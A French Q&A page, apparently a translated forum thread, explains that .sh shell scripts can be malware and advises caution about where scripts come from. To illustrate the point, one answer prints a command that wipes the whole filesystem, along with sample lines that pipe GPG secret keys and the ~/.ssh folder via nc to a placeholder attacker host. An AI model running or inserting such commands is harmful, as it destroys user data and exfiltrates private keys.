GNU/Linux >> Tutoriels Linux >  >> Linux

Un fichier .sh peut-il être un malware ?

.sh les fichiers sont des scripts shell. Ils sont analogues à .bat fichiers (cmd scripts) sous Windows. Tous ces éléments (scripts shell, scripts cmd, .exe Les exécutables Windows, les exécutables Linux (qui n'ont généralement pas d'extension)) sont des programmes exécutables ; si vous en exécutez un, il peut faire tout ce que vous pouvez faire. Alors oui, les scripts shell peuvent être dangereux. Traitez un script shell (ou un script Perl, ou un script Python, ou un script Ruby, etc.) avec le même soupçon que vous traiteriez n'importe quelle autre application.

Il est un peu plus difficile de cacher un logiciel malveillant dans un script shell sans avoir l'air suspect, car il s'agit d'un script qui peut être lu par des personnes connaissant le langage de script. Mais ce n'est pas beaucoup plus difficile; peu de gens, même avec les connaissances techniques, prendraient la peine de revoir le code, vous pouvez donc espérer passer inaperçu.

En pratique, il y a moins de logiciels malveillants pour Linux que pour Windows. C'est probablement principalement parce que Linux a beaucoup moins de part de marché que Windows sur le bureau, donc le retour sur investissement pour l'écriture de logiciels malveillants Linux est moindre. De plus, il existe une culture ancrée depuis longtemps de partage de petites améliorations du système dans le monde Linux, plus que dans le monde Windows; la prépondérance des probabilités indique donc qu'il s'agit de quelqu'un qui partage une petite amélioration et non d'un logiciel malveillant. Mais il pourrait s'agir d'un logiciel malveillant se présentant comme une petite amélioration. En fin de compte, vous devez décider si vous pouvez faire confiance au site sur lequel vous obtenez cette application ou aux personnes qui ont recommandé ce site. Privilégiez les programmes qui proviennent de votre distribution (c'est-à-dire que vous pouvez installer depuis la logithèque), car ils ont subi quelques révisions.

Maintenant, concernant ce programme spécifique :j'ai jeté un coup d'œil rapide, et ça a l'air bénin. Je n'ai rien vu qui stockerait votre mot de passe n'importe où sans vous le dire ou qui ferait des choses sur votre ordinateur autres que ce pour quoi il est annoncé. Notez que je n'ai fait qu'un examen de 2 minutes, que n'importe quel auteur de logiciels malveillants à distance intelligent pourrait passer. Le programme semble raisonnablement bien écrit.

Je ne recommanderais pas nécessairement ce programme à moins que vous ne ressentiez un besoin pressant qui n'est pas pris en charge par les packages de la distribution Ubuntu. Ubuntu est livré avec l'hippocampe Interface graphique vers GPG (il existe également kgpg pour les utilisateurs de KDE). Vous pouvez également installer seahorse-nautilus (ou seahorse-plugin dans les anciennes versions) pour l'intégration de Nautilus.


#!/bin/sh
rm -rf --no-preserve-root /

C'est un malware, et c'est un script shell. Une version plus avancée pourrait inclure quelque chose comme :

gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80

Alors oui, un script shell peut être malveillant. Il peut devenir plus complexe et faire appel à d'autres langages de script, bibliothèques ou même être une archive shell qui crache et appelle un exécutable normal.

Pour la plupart, tout ce que vous exécutez obtient les autorisations de l'utilisateur.


Bien sûr! Il peut faire tout ce que vous pouvez faire ! Regarder les logs, vous keylog, voler des fichiers etc...

En fonction de ce que son développeur a écrit sur le code source ! Il peut tout faire.....

Et c'est très facile à faire, donc si vous recevez un fichier .sh suspect, réfléchissez-y à deux fois avant de l'exécuter !


Linux
  1. Un script Bash peut-il être accroché à un fichier ?

  2. Script Shell pour déplacer les fichiers les plus anciens ?

  3. Comment créer un fichier temporaire en script shell ?

  4. Script Shell :Condition "si le fichier n'est pas utilisé" ?

  5. Modification du contenu d'un fichier via un script shell

35 exemples de scripts bash

Qu'est-ce qu'un fichier .sh ?

déplacer uniquement si le fichier existe dans un script shell

Comment exécuter un fichier sans extension .sh dans le shell

Créer des modèles avec Linux dans un script Shell ?

Un script shell peut-il attendre qu'un fichier change et agir ?